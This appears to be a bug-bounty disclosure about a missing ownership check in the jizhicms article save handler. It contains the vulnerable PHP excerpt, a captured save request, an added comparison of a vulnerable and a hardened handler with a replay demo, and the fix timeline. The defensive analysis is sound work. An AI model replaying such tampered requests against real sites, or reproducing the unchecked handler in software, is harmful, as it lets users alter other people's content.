Modify other people's articles by tampering with the request packet in cherry-toto/jizhicms

Valid

Reported on

Aug 8th 2022


Description

The release handler does not check whether the requester owns the article it is about to save. By capturing the save request in the browser and tampering with it, a logged-in user can modify the content of another user's article even though they are not its owner and have no permission to edit it.

Proof of Concept

// Excerpt of the article save path in the user-facing release handler, as quoted
// in the report. $data is assembled entirely from request parameters; nothing in
// the excerpt ties the article being saved to the logged-in user.
$data = $this->frparam();
$data = get_fields_data($data, 'article');
if (!$this->frparam('seo_title', 1) && $this->frparam('config_seotitle') == 1) {
    $data['seo_title'] = $data['title'];
}
if (!$this->frparam('description', 1) && $this->frparam('config_description') == 1) {
    $data['description'] = newstr(strip_tags($data['body']), 200);
}
if (!$this->frparam('litpic', 1) && $this->frparam('config_litpic') == 1) {
    // Fall back to the first <img> in the raw POST body as the thumbnail.
    $pattern = '/<img.*?src="(.*?)".*?>/is';
    if (!$this->frparam('body', 1)) {
        $r = preg_match($pattern, $_POST['body'], $matchContent);
        if ($r) {
            $data['litpic'] = $matchContent[1];
        } else {
            $data['litpic'] = '';
        }
    }
}
// (the report's excerpt ends here)


POST /user/release.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 156
Origin: http://localhost
Connection: close
Referer: http://localhost/user/release.html
Cookie: PHPSESSID=pgbnunsra5bovtngp8g29ue7es

ajax=1&isshow=&molds=article&tid=1&title=test&keywords=jiafen&description=fefenef&litpic=&body=<p>wwwowota</p><p>woyaofen<br/></p>

Note: the body above is shown URL-decoded; the Content-Length of 156 corresponds to the encoded form (%3C, %3E, %2F). The capture is the ordinary save request from the researcher's own session; the report does not show which field was altered to target another user's article.

Impact

The program does not check whether the requester has permission to edit the article referenced in the request. By capturing and replaying the save request, a user can modify the content of other people's articles, and even their attribution.
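The check the report says is missing, as an added illustration (this is not jizhicms code and not the 2.3.6 fix): a minimal save handler against an in-memory SQLite table, once in the vulnerable shape, where the row to update is chosen by the client-supplied id alone, and once in a hardened shape, where ownership is part of the UPDATE's WHERE clause so the check and the write cannot be separated. The request field name `id`, the `userid` column, the session shape and the sample rows are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Constructed sample table (assumption: an article row carries the owner in userid).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, userid INTEGER NOT NULL, title TEXT, body TEXT)');
$db->exec("INSERT INTO article VALUES (1, 10, 'Alice post', '<p>hello</p>'), (2, 20, 'Bob post', '<p>world</p>')");

/**
 * Vulnerable shape: the row is selected by the id taken from the request only.
 * $sessionUserId is accepted but never reaches the query, so any logged-in user
 * can overwrite any article by changing id in the captured save request.
 */
function release_vulnerable(PDO $db, int $sessionUserId, array $post): array
{
    $id = (int)($post['id'] ?? 0);
    if ($id === 0) {
        return ['code' => 400, 'msg' => 'missing id'];
    }
    $stmt = $db->prepare('UPDATE article SET title = :title, body = :body WHERE id = :id');
    $stmt->execute([':title' => $post['title'], ':body' => $post['body'], ':id' => $id]);
    return $stmt->rowCount() === 1
        ? ['code' => 200, 'msg' => 'updated']
        : ['code' => 404, 'msg' => 'article not found'];
}

/**
 * Hardened shape: the owner is part of the WHERE clause, so a row that does not
 * belong to the session user is simply never written. The existence lookup runs
 * only after the scoped update touched nothing, to tell "forbidden" from "absent".
 */
function release_fixed(PDO $db, int $sessionUserId, array $post): array
{
    $id = (int)($post['id'] ?? 0);
    if ($id === 0) {
        return ['code' => 400, 'msg' => 'missing id'];
    }
    $stmt = $db->prepare(
        'UPDATE article SET title = :title, body = :body WHERE id = :id AND userid = :uid'
    );
    $stmt->execute([
        ':title' => $post['title'], ':body' => $post['body'],
        ':id' => $id, ':uid' => $sessionUserId,
    ]);
    if ($stmt->rowCount() === 1) {
        return ['code' => 200, 'msg' => 'updated'];
    }
    $exists = $db->prepare('SELECT 1 FROM article WHERE id = :id');
    $exists->execute([':id' => $id]);
    return $exists->fetchColumn() !== false
        ? ['code' => 403, 'msg' => 'you are not the owner of this article']
        : ['code' => 404, 'msg' => 'article not found'];
}

function article_title(PDO $db, int $id): string
{
    $stmt = $db->prepare('SELECT title FROM article WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return (string)$stmt->fetchColumn();
}

// Constructed replay: the captured save request with the target's id swapped in.
// Bob (userid 20) submits it against Alice's article (id 1).
$post = ['id' => '1', 'title' => 'test', 'body' => '<p>wwwowota</p><p>woyaofen<br/></p>'];

print_r(release_fixed($db, 20, $post));
echo 'article 1 after hardened handler:   ', article_title($db, 1), PHP_EOL;

print_r(release_vulnerable($db, 20, $post));
echo 'article 1 after vulnerable handler: ', article_title($db, 1), PHP_EOL;
```

Run it with the PHP CLI (pdo_sqlite is needed). The design point is that ownership lives in the same statement as the write rather than in a separate SELECT beforehand: a check-then-update pair can drift apart as the handler grows, while `WHERE id = ? AND userid = ?` cannot be bypassed by any value the client puts in the request.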

We are processing your report and will contact the cherry-toto/jizhicms team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the cherry-toto/jizhicms team and are waiting to hear back a year ago
留恋风 validated this vulnerability a year ago

Thank you for your report. I will fix it in the next version!

breakalegcml has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the cherry-toto/jizhicms team. We will try again in 7 days. a year ago
留恋风 marked this as fixed in 2.3.6 with commit e1abb4 a year ago
留恋风 has been awarded the fix bounty
This vulnerability will not receive a CVE
breakalegcml (Researcher), a year ago:

Hello, could you please apply for a CVE?